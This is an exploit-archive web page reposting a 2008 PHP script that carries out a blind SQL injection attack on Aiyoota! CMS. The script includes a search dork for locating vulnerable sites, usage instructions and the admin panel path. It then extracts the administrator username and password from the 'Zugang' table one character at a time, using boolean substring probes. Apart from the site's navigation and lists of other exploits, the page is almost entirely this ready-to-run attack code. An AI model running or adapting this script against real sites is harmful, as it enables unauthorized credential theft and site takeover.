首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Aiyoota! CMS - Blind SQL Injection Exploit 来源：www.vfcocus.net 作者：Lidloses 发布时间：2008-12-16   <?php     ini_set("max_execution_time",0);     ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');     print_r(' ############################################################### # #           Aiyoota! CMS - Blind SQL Injection Exploit      #                                                              #      Vulnerability discovered by: Lidloses_Auge              #      Exploit coded by:            Lidloses_Auge #      Greetz to:                   -=Player=- , Suicide, g4ms3, enco, #                                   Palme, GPM, Free-Hack #      Date:                        16.12.2008 # ############################################################### #                                                              #      Dork: inurl:naviid + inurl:liste9 #      Admin Panel: [Target]/cms/ #      Usage (Method 1 auto):  php '.$argv[0].' -1 [Target] #      Usage (Method 2 manually):  php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file] #      Example (Method 1) for http://www.site.com #      => php '.$argv[0].' -1 http://www.site.com #      Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html #      => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html #                                                              ############################################################### ');     $automatic = $argv[1];     $url = $argv[2];     if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) {         if ($argv[1] == "-1") {             $source = file_get_contents($url."/index.html");             $buffer = $source;             if (strpos($source,"a href='$url/") != 0) {                 $place = strpos($source,"a href='$url/");                 $sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/"));                 $urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'"));             } else {                 while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") {                     $buffer = substr($buffer,strpos($buffer,"a href='/"));                 }                 $place = strpos($buffer, "a href='/");                 $sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/"));                 $urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'"));             }             $varstart = strpos($urlpart,$sprache)+strlen($sprache)+1;             $injplace = strpos(substr($urlpart,$varstart),"/") + $varstart;             $part1 = substr($urlpart,0,$injplace);             $part2 = substr($urlpart,$injplace);         } elseif ($argv[1] == "-2") {             $part1 = $url."/".$argv[3]."/".$argv[4];             $part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7];         }         echo "\nExploiting now!\n\n";         $true = file_get_contents($part1."+and+1=1".$part2);         $false = file_get_contents($part1."+and+1=0".$part2);         $inj = $false;         $tbl = array("benutzer","passwort");         if (strlen($false) != strlen($true)) {             for ($mode = 0; $mode <= 1; $mode++) {                 echo $tbl[$mode].": ";                 while ($break == 0) {                     $count++;                     $injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2);                     $injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2);                     $injpart3 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2);                     $injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2);                     $injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2);                     if (strlen($false) / strlen($injpart1) * 100 < 98) {                         if (strlen($false) / strlen($injpart2) * 100 < 98) {                             $border1 = 103;                             $border2 = 122;                         } else {                             $border1 = 96;                             $border2 = 108;                         }                     }                     if (strlen($false) / strlen($injpart3) * 100 < 98) {                         if (strlen($false) / strlen($injpart4) * 100 < 98) {                             if (strlen($false) / strlen($injpart5) * 100 < 98) {                                 $border1 = 47;                                 $border2 = 57;                             } else {                             $border1 = 59;                             $border2 = 69;                             }                         } else {                            $border1 = 70;                         $border2 = 96;                         }                     }                            for ($i = $border1; $i<=$border2; $i++) {                         $zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2);                         if (strlen($false) / strlen($zero) * 100 < 98) {                             $break = 1;                             echo "\n";                             $i = $border2+1;                         } else {                             $inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2);                             if ((strlen($inj) / strlen($true) * 100) < 98) {                                 echo chr($i);                                 $i = $border2+1;                             }                         }                     }                 }                 $break = 0;                 $count = 0;             }         }     } else {         echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n";     } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FLDS 1.2a report.php (linkida) ·Realtek Sound Manager (rtlrack ·Microsoft SQL Server sp_replwr ·PHP python extension safe_mode ·Phoenician Casino FlashAX Acti ·Lizardware CMS <= 0.6.0 Blind ·MS Internet Explorer XML Parsi ·Microsoft Outlook Express DoS ·Mediatheka <= 4.2 Remote Blind ·eZ Publish < 3.9.5/3.10.1/4.0. ·Amaya Web Browser 10.0.1/10.1- ·2532Gigs 1.2.2 Stable Remote C   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved